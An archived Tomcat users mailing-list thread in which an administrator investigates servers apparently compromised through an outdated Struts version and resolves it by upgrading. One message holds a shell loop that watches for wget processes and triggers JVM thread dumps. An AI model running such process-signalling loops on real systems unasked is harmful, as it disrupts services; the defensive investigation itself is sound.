You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@tomcat.apache.org by Leonardo Santagostini <ls...@gmail.com> on 2014/04/29 21:08:06 UTC
Regarding i think an intrusion
Hello list,
Im facing an issue in 6 tomcat server that are getting penetrated and they
are executing malicious scripts on my server.
Im using 7.0.53 on my servers. Running Centos 5.8
Let me know what information you need.
PS: This is my first mail to this list, so i apologize for this not gentle
presentation.
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
Re: Regarding i think an intrusion
Posted by JB MORLA <jb...@gmail.com>.
Hi,
I am learning to set up a server and I found this article about security
http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables
On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini <
lsantagostini@gmail.com> wrote:
> Hello list,
>
> Im facing an issue in 6 tomcat server that are getting penetrated and they
> are executing malicious scripts on my server.
>
> Im using 7.0.53 on my servers. Running Centos 5.8
>
> Let me know what information you need.
>
> PS: This is my first mail to this list, so i apologize for this not gentle
> presentation.
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well well well. Thank you all so much !!!
Since Struts upgrade i got not intrussion on my servers =) =)
Thank you list for the support, for the time and for helpme with this issue.
Yours,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-20 12:45 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all, again its me =)
>
> Just for you that today we deployed our apps using struts 2.3.16.2
>
> So since today i will monitor those server very closely =)
>
> Thanks all people. I will tell you how things go.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>
> :
>
> Hello all !
>>
>> Developers are still "estimating the effort" for upgrading struts.... i
>> will let you know how things are going.
>>
>> Thanks all for replying me.
>>
>> Regards,
>> Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>>
>>> > Subject: Re: Regarding i think an intrusion
>>> > From: lsantagostini@gmail.com
>>> > To: users@tomcat.apache.org
>>> >
>>> > Hello Chris, but this logfile was only one day.
>>> MG>Ay Caramba!
>>> >
>>> > Maybe i had a concept mismatch trying to capture the exact moment when
>>> the
>>> > execution begins.
>>> >
>>> > My command was
>>> >
>>> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep
>>> -v
>>> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
>>> grep
>>> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
>>> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3;
>>> done
>>> >
>>> > Maybe too many dumps all togheter, now im trying to get a "live"
>>> capture
>>> > without luck =(
>>> >
>>> > If you know a better method, please letme know it.
>>> >
>>> > Thanks for your effort, knid regards,
>>> > Leonardo
>>> >
>>> > Saludos.-
>>> > Leonardo Santagostini
>>> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
>>> utilizar JDK @ 1.7 (ahora)
>>> MG>esto
>>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>>> java.lang.Thread.State: TIMED_WAITING (sleeping)
>>> at java.lang.Thread.sleep(Native Method)
>>> at
>>> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>>> at java.lang.Thread.run(Thread.java:662)
>>> MG>Estos registros informativos producen MUCHO ruido
>>> MG>log4j.properties
>>> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>>>
>>> MG>eso
>>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>>> runnable [0x0000000046f34000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>>> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>>> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>>> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>>> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>>> MG>DEMASIADO!
>>> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
>>> .\WEB-INF\urlrewrite.xml...por ejemplo
>>> <!-- regex no es necessario -->
>>> <!-- rule match-type="regex">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule -->
>>> <rule match-type="wildcard">
>>> <name>BasicRule</name>
>>> <from>basicfrom</from>
>>> <to>basicto</to>
>>> </rule>
>>> MG>puedes ver que nombre, desde y a son los mismos
>>>
>>> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
>>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>>> waiting on condition [0x000000004ad9b000]
>>> java.lang.Thread.State: RUNNABLE
>>> at java.util.Vector.addElement(Vector.java:572)
>>> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>>> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>>> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>>> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>>
>>> MG>necessita mata el proceso o cambia proceso lento ...(log4j
>>> updateParents) por ejemplo en log4j
>>> package org.apache.log4j;
>>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>>> org.apache.log4j.spi.RendererSupport{
>>> private org.apache.log4j.spi.LoggerFactory defaultFactory;
>>> private java.util.Vector listeners;
>>> // Hashtable ht;
>>> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
>>> java.util.ConcurrentHashMap<String,ProvisionNode>();
>>>
>>> //mucho mas tarde
>>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>>> factory) {
>>> {
>>> ....
>>> } else if (o instanceof org.apache.log4j.ProvisionNode) {
>>> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>>> logger = factory.makeNewLoggerInstance(name);
>>> logger.setHierarchy(this);
>>> ht.put(key, logger);
>>> updateChildren((ProvisionNode) o, logger);
>>> updateParents(logger);
>>> return logger;
>>> }
>>>
>>>
>>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>>> MG>Entiendes?
>>> MG>Martín
>>>
>>> >
>>> > <http://ar.linkedin.com/in/santagostini>
>>> >
>>> >
>>> >
>>> >
>>> >
>>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
>>> chris@christopherschultz.net
>>> > >:
>>> >
>>> > > -----BEGIN PGP SIGNED MESSAGE-----
>>> > > Hash: SHA256
>>> > >
>>> > > Leonardo,
>>> > >
>>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>>> > > > Ok, again its uploaded.
>>> > > >
>>> > > > This is the link
>>> > > >
>>> > > >
>>> > >
>>> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>>> > >
>>> > > 1/2
>>> > > >
>>> > > GiB log file? Hrm.
>>> > >
>>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>>> > > weeks of your logs) that you took while the "intrusion" was taking
>>> > > place, post that.
>>> > >
>>> > > If you don't, then I think you're out of luck.
>>> > >
>>> > > Sounds like a bad time to go on holiday.
>>> > >
>>> > > - -chris
>>> > > -----BEGIN PGP SIGNATURE-----
>>> > > Version: GnuPG v1
>>> > > Comment: GPGTools - http://gpgtools.org
>>> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>> > >
>>> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
>>> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
>>> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
>>> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
>>> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
>>> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
>>> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
>>> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
>>> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
>>> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
>>> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
>>> > > EcwrNcX2iZ+JXXtSTnzH
>>> > > =nxGK
>>> > > -----END PGP SIGNATURE-----
>>> > >
>>> > > ---------------------------------------------------------------------
>>> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>>> > > For additional commands, e-mail: users-help@tomcat.apache.org
>>> > >
>>> > >
>>>
>>>
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, again its me =)
Just for you that today we deployed our apps using struts 2.3.16.2
So since today i will monitor those server very closely =)
Thanks all people. I will tell you how things go.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all !
>
> Developers are still "estimating the effort" for upgrading struts.... i
> will let you know how things are going.
>
> Thanks all for replying me.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>
>> > Subject: Re: Regarding i think an intrusion
>> > From: lsantagostini@gmail.com
>> > To: users@tomcat.apache.org
>> >
>> > Hello Chris, but this logfile was only one day.
>> MG>Ay Caramba!
>> >
>> > Maybe i had a concept mismatch trying to capture the exact moment when
>> the
>> > execution begins.
>> >
>> > My command was
>> >
>> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
>> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
>> grep
>> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
>> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
>> >
>> > Maybe too many dumps all togheter, now im trying to get a "live" capture
>> > without luck =(
>> >
>> > If you know a better method, please letme know it.
>> >
>> > Thanks for your effort, knid regards,
>> > Leonardo
>> >
>> > Saludos.-
>> > Leonardo Santagostini
>> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
>> utilizar JDK @ 1.7 (ahora)
>> MG>esto
>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>> java.lang.Thread.State: TIMED_WAITING (sleeping)
>> at java.lang.Thread.sleep(Native Method)
>> at
>> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>> at java.lang.Thread.run(Thread.java:662)
>> MG>Estos registros informativos producen MUCHO ruido
>> MG>log4j.properties
>> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>>
>> MG>eso
>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>> runnable [0x0000000046f34000]
>> java.lang.Thread.State: RUNNABLE
>> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>> MG>DEMASIADO!
>> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
>> .\WEB-INF\urlrewrite.xml...por ejemplo
>> <!-- regex no es necessario -->
>> <!-- rule match-type="regex">
>> <name>BasicRule</name>
>> <from>basicfrom</from>
>> <to>basicto</to>
>> </rule -->
>> <rule match-type="wildcard">
>> <name>BasicRule</name>
>> <from>basicfrom</from>
>> <to>basicto</to>
>> </rule>
>> MG>puedes ver que nombre, desde y a son los mismos
>>
>> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>> waiting on condition [0x000000004ad9b000]
>> java.lang.Thread.State: RUNNABLE
>> at java.util.Vector.addElement(Vector.java:572)
>> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>
>> MG>necessita mata el proceso o cambia proceso lento ...(log4j
>> updateParents) por ejemplo en log4j
>> package org.apache.log4j;
>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>> org.apache.log4j.spi.RendererSupport{
>> private org.apache.log4j.spi.LoggerFactory defaultFactory;
>> private java.util.Vector listeners;
>> // Hashtable ht;
>> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
>> java.util.ConcurrentHashMap<String,ProvisionNode>();
>>
>> //mucho mas tarde
>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>> factory) {
>> {
>> ....
>> } else if (o instanceof org.apache.log4j.ProvisionNode) {
>> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>> logger = factory.makeNewLoggerInstance(name);
>> logger.setHierarchy(this);
>> ht.put(key, logger);
>> updateChildren((ProvisionNode) o, logger);
>> updateParents(logger);
>> return logger;
>> }
>>
>>
>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>> MG>Entiendes?
>> MG>Martín
>>
>> >
>> > <http://ar.linkedin.com/in/santagostini>
>> >
>> >
>> >
>> >
>> >
>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
>> chris@christopherschultz.net
>> > >:
>> >
>> > > -----BEGIN PGP SIGNED MESSAGE-----
>> > > Hash: SHA256
>> > >
>> > > Leonardo,
>> > >
>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>> > > > Ok, again its uploaded.
>> > > >
>> > > > This is the link
>> > > >
>> > > >
>> > >
>> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>> > >
>> > > 1/2
>> > > >
>> > > GiB log file? Hrm.
>> > >
>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>> > > weeks of your logs) that you took while the "intrusion" was taking
>> > > place, post that.
>> > >
>> > > If you don't, then I think you're out of luck.
>> > >
>> > > Sounds like a bad time to go on holiday.
>> > >
>> > > - -chris
>> > > -----BEGIN PGP SIGNATURE-----
>> > > Version: GnuPG v1
>> > > Comment: GPGTools - http://gpgtools.org
>> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>> > >
>> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
>> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
>> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
>> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
>> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
>> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
>> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
>> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
>> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
>> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
>> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
>> > > EcwrNcX2iZ+JXXtSTnzH
>> > > =nxGK
>> > > -----END PGP SIGNATURE-----
>> > >
>> > > ---------------------------------------------------------------------
>> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> > > For additional commands, e-mail: users-help@tomcat.apache.org
>> > >
>> > >
>>
>>
>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all !
Developers are still "estimating the effort" for upgrading struts.... i
will let you know how things are going.
Thanks all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
> > Subject: Re: Regarding i think an intrusion
> > From: lsantagostini@gmail.com
> > To: users@tomcat.apache.org
> >
> > Hello Chris, but this logfile was only one day.
> MG>Ay Caramba!
> >
> > Maybe i had a concept mismatch trying to capture the exact moment when
> the
> > execution begins.
> >
> > My command was
> >
> > while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> > "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea |
> grep
> > java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> > corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
> >
> > Maybe too many dumps all togheter, now im trying to get a "live" capture
> > without luck =(
> >
> > If you know a better method, please letme know it.
> >
> > Thanks for your effort, knid regards,
> > Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita
> utilizar JDK @ 1.7 (ahora)
> MG>esto
> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
> java.lang.Thread.State: TIMED_WAITING (sleeping)
> at java.lang.Thread.sleep(Native Method)
> at
> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
> at java.lang.Thread.run(Thread.java:662)
> MG>Estos registros informativos producen MUCHO ruido
> MG>log4j.properties
> MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
>
> MG>eso
> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
